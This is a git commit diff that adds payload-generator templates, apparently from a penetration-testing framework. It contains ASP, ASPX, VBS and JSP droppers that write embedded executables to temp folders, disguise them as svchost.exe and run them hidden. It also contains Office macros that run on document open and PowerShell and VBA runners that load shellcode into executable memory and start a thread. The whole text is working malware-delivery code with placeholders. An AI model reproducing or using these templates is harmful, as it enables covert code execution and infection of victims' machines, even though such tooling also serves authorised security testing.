Commit adding the template scripts.
This commit is contained in:
parent
97933c4954
commit
c2cf822013
|
@ -0,0 +1,23 @@
|
|||
<%
|
||||
Sub %{var_func}()
|
||||
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempexe}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
|
||||
%{var_stream}.Write %{var_bytes}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run %{var_tempexe}, 0, false
|
||||
End Sub
|
||||
|
||||
%{var_func}
|
||||
%>
|
|
@ -0,0 +1,34 @@
|
|||
<%@ Page Language="C#" AutoEventWireup="true" %>
|
||||
<%@ Import Namespace="System.IO" %>
|
||||
<script runat="server">
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
StringBuilder %{var_file} = new StringBuilder();
|
||||
%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}");
|
||||
string %{var_tempdir} = Path.GetTempPath();
|
||||
string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
|
||||
string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
|
||||
|
||||
Directory.CreateDirectory(%{var_basedir});
|
||||
|
||||
FileStream fs = File.Create(%{var_tempexe});
|
||||
|
||||
try
|
||||
{
|
||||
foreach (char %{var_iterator} in %{var_file}.ToString())
|
||||
{
|
||||
fs.WriteByte(Convert.ToByte(%{var_iterator}));
|
||||
}
|
||||
}
|
||||
finally
|
||||
{
|
||||
if (fs != null) ((IDisposable)fs).Dispose();
|
||||
}
|
||||
|
||||
System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
|
||||
%{var_proc}.StartInfo.CreateNoWindow = true;
|
||||
%{var_proc}.StartInfo.UseShellExecute = true;
|
||||
%{var_proc}.StartInfo.FileName = %{var_tempexe};
|
||||
%{var_proc}.Start();
|
||||
}
|
||||
</script>
|
|
@ -0,0 +1,80 @@
|
|||
'**************************************************************
|
||||
'*
|
||||
'* This code is now split into two pieces:
|
||||
'* 1. The Macro. This must be copied into the Office document
|
||||
'* macro editor. This macro will run on startup.
|
||||
'*
|
||||
'* 2. The Data. The hex dump at the end of this output must be
|
||||
'* appended to the end of the document contents.
|
||||
'*
|
||||
'**************************************************************
|
||||
'*
|
||||
'* MACRO CODE
|
||||
'*
|
||||
'**************************************************************
|
||||
|
||||
Sub Auto_Open()
|
||||
%{func_name1}
|
||||
End Sub
|
||||
|
||||
Sub %{func_name1}()
|
||||
Dim %{var_appnr} As Integer
|
||||
Dim %{var_fname} As String
|
||||
Dim %{var_fenvi} As String
|
||||
Dim %{var_fhand} As Integer
|
||||
Dim %{var_parag} As Paragraph
|
||||
Dim %{var_index} As Integer
|
||||
Dim %{var_gotmagic} As Boolean
|
||||
Dim %{var_itemp} As Integer
|
||||
Dim %{var_stemp} As String
|
||||
Dim %{var_btemp} As Byte
|
||||
Dim %{var_magic} as String
|
||||
%{var_magic} = "%{var_magic}"
|
||||
%{var_fname} = "%{filename}.exe"
|
||||
%{var_fenvi} = Environ("USERPROFILE")
|
||||
ChDrive (%{var_fenvi})
|
||||
ChDir (%{var_fenvi})
|
||||
%{var_fhand} = FreeFile()
|
||||
Open %{var_fname} For Binary As %{var_fhand}
|
||||
For Each %{var_parag} in ActiveDocument.Paragraphs
|
||||
DoEvents
|
||||
%{var_stemp} = %{var_parag}.Range.Text
|
||||
If (%{var_gotmagic} = True) Then
|
||||
%{var_index} = 1
|
||||
While (%{var_index} < Len(%{var_stemp}))
|
||||
%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
|
||||
#Put %{var_fhand}, , %{var_btemp}
|
||||
%{var_index} = %{var_index} + 4
|
||||
Wend
|
||||
ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
|
||||
%{var_gotmagic} = True
|
||||
End If
|
||||
Next
|
||||
Close %{var_fhand}
|
||||
%{func_name2}(%{var_fname})
|
||||
End Sub
|
||||
|
||||
Sub %{func_name2}(%{var_farg} As String)
|
||||
Dim %{var_appnr} As Integer
|
||||
Dim %{var_fenvi} As String
|
||||
%{var_fenvi} = Environ("USERPROFILE")
|
||||
ChDrive (%{var_fenvi})
|
||||
ChDir (%{var_fenvi})
|
||||
%{var_appnr} = Shell(%{var_farg}, vbHide)
|
||||
End Sub
|
||||
|
||||
Sub AutoOpen()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
||||
Sub Workbook_Open()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
||||
'**************************************************************
|
||||
'*
|
||||
'* PAYLOAD DATA
|
||||
'*
|
||||
'**************************************************************
|
||||
|
||||
%{var_magic}%{data}
|
|
@ -0,0 +1,24 @@
|
|||
Function %{var_func}()
|
||||
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempexe}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
||||
%{var_stream}.Write %{var_bytes}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run %{var_tempexe}, 0, true
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFolder(%{var_basedir})
|
||||
End Function
|
||||
|
||||
%{init}
|
|
@ -0,0 +1,49 @@
|
|||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
String %{var_data} = "";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
||||
{
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
|
||||
int %{var_numbytes} = %{var_inputstream}.available();
|
||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
||||
%{var_inputstream}.read(%{var_bytearray});
|
||||
%{var_inputstream}.close();
|
||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
||||
{
|
||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
||||
%{var_comb} <<= 4;
|
||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
||||
}
|
||||
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
}
|
||||
else
|
||||
{
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
%>
|
|
@ -0,0 +1,32 @@
|
|||
#If Vba7 Then
|
||||
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
|
||||
#Else
|
||||
Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
|
||||
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
|
||||
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
|
||||
#EndIf
|
||||
|
||||
Sub Auto_Open()
|
||||
Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
|
||||
#If Vba7 Then
|
||||
Dim %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
|
||||
#Else
|
||||
Dim %{var_rwxpage} As Long, %{var_res} As Long
|
||||
#EndIf
|
||||
%{var_myArray} = Array(%{bytes})
|
||||
%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
|
||||
For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
|
||||
%{var_myByte} = %{var_myArray}(%{var_offset})
|
||||
%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
|
||||
Next %{var_offset}
|
||||
%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
|
||||
End Sub
|
||||
Sub AutoOpen()
|
||||
Auto_Open
|
||||
End Sub
|
||||
Sub Workbook_Open()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
|
@ -0,0 +1,19 @@
|
|||
$%{var_code} = @"
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("msvcrt.dll")]
|
||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
||||
"@
|
||||
|
||||
$%{var_win32_func} = Add-Type -memberDefinition $%{var_code} -Name "Win32" -namespace Win32Functions -passthru
|
||||
[Byte[]]$%{var_payload} = 0x%{code[0].to_s(16)}%{shellcode}
|
||||
|
||||
$%{var_size} = 0x1000
|
||||
|
||||
if ($%{var_payload}.Length -gt 0x1000) {$%{var_size} = $%{var_payload}.Length}
|
||||
$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
|
||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_payload}.Length-1);$%{var_iter}++) {$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_payload}[$%{var_iter}], 1)}
|
||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
Set-StrictMode -Version 2
|
||||
$%{var_syscode} = @"
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
||||
}
|
||||
}
|
||||
"@
|
||||
|
||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory = $True
|
||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
||||
|
||||
[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode}
|
||||
|
||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
Loading…
Reference in New Issue